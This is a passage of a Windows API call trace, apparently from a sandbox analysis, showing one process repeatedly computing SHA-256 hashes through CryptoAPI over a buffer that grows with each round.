	[0229.885] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0229.885] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231da30
	[0229.885] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231da30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231da30, pdwDataLen=0x128ba4) returned 1
	[0229.885] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.885] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.885] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.885] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.885] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0229.885] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231da58
	[0229.885] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231da58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231da58, pdwDataLen=0x128ba4) returned 1
	[0229.886] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.886] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.886] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.886] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.886] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0229.886] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231da80
	[0229.886] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231da80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231da80, pdwDataLen=0x128ba4) returned 1
	[0229.886] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.886] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.886] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.886] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.886] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0229.886] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231daa8
	[0229.887] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231daa8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231daa8, pdwDataLen=0x128ba4) returned 1
	[0229.887] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.887] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.887] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.887] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.887] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0229.887] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dad0
	[0229.887] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dad0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dad0, pdwDataLen=0x128ba4) returned 1
	[0229.887] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.887] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.887] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.887] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.887] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0229.887] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231daf8
	[0229.888] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231daf8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231daf8, pdwDataLen=0x128ba4) returned 1
	[0229.888] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.888] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.888] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.888] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.888] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0229.888] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231db20
	[0229.888] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231db20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231db20, pdwDataLen=0x128ba4) returned 1
	[0229.888] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.888] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.888] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.888] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.888] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0229.889] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231db48
	[0229.889] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231db48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231db48, pdwDataLen=0x128ba4) returned 1
	[0229.889] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.889] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.889] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.889] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.889] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0229.889] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231db70
	[0229.889] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231db70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231db70, pdwDataLen=0x128ba4) returned 1
	[0229.889] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.889] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.889] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.889] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.889] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0229.890] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231db98
	[0229.890] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231db98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231db98, pdwDataLen=0x128ba4) returned 1
	[0229.890] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.890] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.890] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.890] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.890] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0229.890] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dbc0
	[0229.890] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dbc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dbc0, pdwDataLen=0x128ba4) returned 1
	[0229.890] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.890] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.890] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.890] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.890] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0229.891] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dbe8
	[0229.891] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dbe8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dbe8, pdwDataLen=0x128ba4) returned 1
	[0229.891] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.891] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.891] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.891] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.891] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0229.891] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dc10
	[0229.891] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dc10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dc10, pdwDataLen=0x128ba4) returned 1
	[0229.891] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.891] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.891] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.892] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.892] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0229.892] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dc38
	[0229.892] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dc38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dc38, pdwDataLen=0x128ba4) returned 1
	[0229.892] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.892] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.892] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.892] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.892] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0229.892] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dc60
	[0229.892] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dc60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dc60, pdwDataLen=0x128ba4) returned 1
	[0229.892] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.892] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.892] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.893] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.893] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0229.893] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.893] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dc88
	[0229.893] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dc88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dc88, pdwDataLen=0x128ba4) returned 1
	[0229.893] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.893] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.893] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.893] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.893] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0229.893] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.893] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dcb0
	[0229.893] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dcb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dcb0, pdwDataLen=0x128ba4) returned 1
	[0229.893] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.893] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.893] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.894] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.894] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0229.894] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dcd8
	[0229.894] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dcd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dcd8, pdwDataLen=0x128ba4) returned 1
	[0229.894] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.894] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.894] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.894] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.894] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0229.894] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dd00
	[0229.894] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dd00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dd00, pdwDataLen=0x128ba4) returned 1
	[0229.894] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.894] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.894] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.895] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.895] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0229.895] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.895] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dd28
	[0229.895] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dd28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dd28, pdwDataLen=0x128ba4) returned 1
	[0229.895] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.895] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.895] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.895] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.895] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0229.895] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.895] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dd50
	[0229.895] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dd50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dd50, pdwDataLen=0x128ba4) returned 1
	[0229.895] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.895] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.895] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.896] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.896] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0229.896] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dd78
	[0229.896] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dd78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dd78, pdwDataLen=0x128ba4) returned 1
	[0229.896] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.896] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.896] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.896] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.896] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0229.896] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dda0
	[0229.896] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dda0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dda0, pdwDataLen=0x128ba4) returned 1
	[0229.896] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.896] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.896] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.897] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.897] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0229.897] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ddc8
	[0229.897] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ddc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ddc8, pdwDataLen=0x128ba4) returned 1
	[0229.897] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.897] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.897] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.897] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.897] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0229.897] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ddf0
	[0229.897] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ddf0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ddf0, pdwDataLen=0x128ba4) returned 1
	[0229.897] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.897] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.897] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.962] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.962] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x360, dwFlags=0x0) returned 1
